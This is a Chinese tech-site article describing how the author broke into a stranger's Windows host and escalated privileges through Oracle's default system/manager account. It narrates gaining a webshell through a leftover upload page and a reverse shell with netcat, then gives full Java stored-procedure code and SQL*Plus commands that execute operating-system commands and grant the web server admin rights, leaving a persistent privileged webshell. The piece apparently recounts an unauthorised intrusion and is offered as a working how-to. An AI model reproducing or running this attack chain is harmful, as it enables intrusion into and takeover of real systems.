51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

通过oracle默认账户提升权限的实现方法

作者:佚名
数据库 Oracle
通过oracle默认账户也能够提升访问的权限?是的,下面就教您这种通过oracle默认账户提升权限的实现方法,供您参考学习。

在oracle数据库中,通过oracle默认账户也是可以提升访问权限的,下文就为您介绍一个通过oracle默认账户提升权限的例子,希望可以让您对数据库安全性方面有所启迪:

近日,偶到一主机上逛了一圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。

接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。从user\程序目录里,发现有一快捷方式:firecontrol,好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务,发现一般的可提权的方法都不可行,无SERV-U等等,主机的补丁也是打到了最新。试了下传了个NC上去,反连接得到一SHELL,这下比在老兵的管理器里舒服多了。

在C盘下看到一个目录oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了主机的服务名“xxx”,看了下版本“oracle 8i”,用数据库连接器 Provider=MSDAORA.1.Password=manager.User ID=system.DataSource=xxxx试了下默认的system账户,密码manager,结果真的就连接到了本地的oracle服务。

这下好了,oracle默认账户就像是mssql下的sa,我们来通过他来提升权限,马上编辑了几个脚本。

1.

  1. sql create or replace and compilejava source named "Util"asimport java.io.*.  
  2. import java.lang.*.   
  3. public class Util extends Object{public static int RunThis(String args)  
  4. {  
  5. Runtime rt = Runtime.getRuntime().  
  6. int rc = -1.   
  7. try{Process p = rt.exec(args).  
  8. int bufSize = 4096.  
  9. BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize).  
  10. int len.byte buffer[] = new byte[bufSize].  
  11. // Echo back what the program spit out  
  12. while ((len = bis.read(buffer, 0, bufSize)) != -1)  
  13. System.out.write(buffer, 0, len).   
  14. rc = p.waitFor().  
  15. }  
  16. catch (Exception e)  
  17. {  
  18. e.printStackTrace().  
  19. rc = -1.  
  20. }  
  21. finally{return rc.  
  22. }  
  23. }  
  24. }  
  25.  

2.

  1. sql create or replacefunction RUN_CMD(p_cmd in varchar2)  
  2. return numberaslanguage javaname Util.RunThis(java.lang.String)   
  3. return integer. 

3.

  1. sql create or replace procedure RC(p_cmd in varchar2)asx number.  
  2. beginx :run_cmd(p_cmd).  
  3. end. 

保存在c:\下,然后用反连接得到的shell运行 sqlplus system/manager@xxx然后再来执行脚本 SQL>@C:\1.sqlSQL>@C:\2.sqlSQL>@C:\3.sql看到JAVA已创建、函数已创建、过程已创建,接着我们继续 SQL> variable x number.SQL> set serveroutput onSQL> exec dbms_java.set_output(100000).SQL>grant javasyspriv to system看到授权成功。

接着我们就可以来执行系统命令了。我想先把ASP.dll加入特权一组 SQL>exec :x := RUN_CMD(cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll" ).看到过程已经成功完成,这个时候我们重新登陆我们的webshell,他已经具有admin权限了。接着,再用NC返回一个shell,已经是管理权限的,我们可以做我们想干的事了。因为这个主机有防火墙过滤除80以外的端口,所以不好做图形的后门,只有留下一有权限的webshell。到此已经提权成功。

 

 

 

【编辑推荐】

oracle数据导出和导入的权限

Oracle用户和模式的区别

查看oracle用户权限

oracle对象权限简介

带您深入了解oracle权限管理

 

责任编辑:段燃 来源: 互联网
oracle默认账户
相关推荐
通过Oracle发送Email实现方法
本篇是通过Oracle10g发送Email实例,该Procedure支持中文邮件、HTML代码、多收件人。希望本文对大家有所帮助。

2009-08-07 09:35:40

Oracle发送Ema
使用低权限Oracle数据库账户得到管理员权限
这几天看了篇叫"Penetration:fromapplicationdowntoOS(Oracle)"的文档,感觉挺有意思的,文档的大概意思就是说,如果ORACLE服务是用administrator账户启动的,你只要有一个具有resource和connect权限的数据库账户,就能利用metasploit的smbrelay功能,本地搭建一个SMB欺骗服务器,来得到系统的访问权限。我本地测试了下,还真的成功了。

2009-07-19 10:06:12

如何通过组策略设置群集用户账户登录权限
通过编辑“组策略”,修改群集用户账户的默认设置,使之拥有登录本地服务器的权限。本文介绍了组策略设置群集用户账户登录权限的方法。

2011-08-02 15:07:43

组策略群集用户账户
浅析Oracle 10g isqlplus使用DBA账户方法
本文介绍了Oracle10gisqlplus使用DBA账户的方法,重点介绍了JAZNshell下的一些操作,希望能够对您有所帮助!

2011-07-27 14:22:41

Oracle 10g DBA账户
Oracle重做日志实现方法
Oracle重做日志是为了记录数据的改变,提供数据库的恢复,下文对Oracle重做日志的方法作了详尽的阐述,供您参考。

2010-11-19 13:42:38

查看Oracle日志实现方法
如果想要查看Oracle数据库中的日志信息,使用dbmslogmnr是一个很好的方法,下文就为您介绍logminer的用法,供您参考。

2010-10-29 13:34:09

Oracle日志
ORACLE默认用户安装及删除方法
ORACLE数据库中,默认用户应该如何安装呢?下文对ORACLE默认用户的安装及删除方法作了详尽的介绍,希望对您能有所帮助。

2010-10-29 10:33:55

ORACLE默认用户
浅析Oracle用户权限分配具体方法
这里我们将介绍Oracle用户权限分配和Oracel从服务器导出数据的方法,希望能对大家有所帮助。

2009-10-21 14:27:12

Oracle用户权限分
浅析Oracle用户权限管理方法
我们将通过介绍命令的方式,谈谈Oracle用户权限表的管理方法,希望对大家有所帮助。

2009-10-21 14:48:39

Oracle用户权限表
Oracle移动控制文件实现方法
Oracle数据库中移动控制文件的方法并不复杂,下文对Oracle移动控制文件的实现方法和步骤作了详细的说明,供您参考学习。

2010-10-29 14:20:54

Oracle移动控制文
Oracle删除归档日志实现方法
Oracle归档日志满了后,就需要删除一部分归档日志,下文对Oracle删除归档日志的方法作了详尽的阐述,如果您感兴趣的话,不妨一看。

2010-11-19 13:14:21

Oracle删除归档日
如何通过互联性方法提升威胁管理水平?
威胁管理框架通常用于评估和管理您为了检测和响应网络威胁所采取的一切措施。该框架涵盖人员、流程和技术,而若要实现高效的威胁管理,所有这三者应达到无缝协作。

2020-11-17 11:35:33

威胁管理
Oracle数据备份通过OMS来实现
此文章主要是描述如何用OMS来实现Oracle数据备份的具体操作方法,以下就是文章的详细内容介绍,望大家浏览完之后会有所收获。

2010-04-14 09:41:10

Oracle数据备份
MySQL账户密码修改方法
修改MySQL账户密码是我们经常要使用到的操作,下文对MySQL账户密码的修改方法作了详细的介绍,如果您感兴趣的话,不妨一看。

2010-10-14 11:48:20

MySQL账户密码
实现Oracle授予用户权限一个实例
本文将讲解的是一个Oracle授予用户权限的实例,包括具体的实现以及原理的讲解,希望大家能喜欢。

2009-11-02 15:15:43

Oracle授予用户权
通过sqllder从csv导入数据到Oracle方法
在初学Oracle时,我们需要导入数据到Oracle数据库,方法有很多种。在这里主要介绍通过sqllder从csv导入数据到Oracle的方法。

2010-04-19 09:06:24

Oracle的方法
详解如何实现Oracle修改用户权限
本文将介绍如何实现Oracle修改用户权限,包括Oracle用户权限的管理,希望对大家有所帮助。

2009-11-03 17:08:38

Oracle修改用户权
oracle查询权限赋予另一用户方法
如何把oracle里一个用户所有表查询权限赋与另一用户呢?下面就教您一个实现表查询权限赋与另一用户的方法,供您参考。

2010-10-28 13:37:19

oracle查询权限
详解查看Oracle用户权限七种方法
在这里我们将介绍如何查看Oracle用户权限的七种方法,这其中的一些代码能直接应用,希望能对大家有所帮助。

2009-10-29 16:32:24

查看Oracle用户的
Oracle删除重复记录实现方法
如果在Oracle数据库中出现了重复的记录,我们就需要用到删除操作,下面就教您几个查看重复记录并删除的方法,供您参考借鉴。

2010-10-27 16:49:23

Oracle删除重复记
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服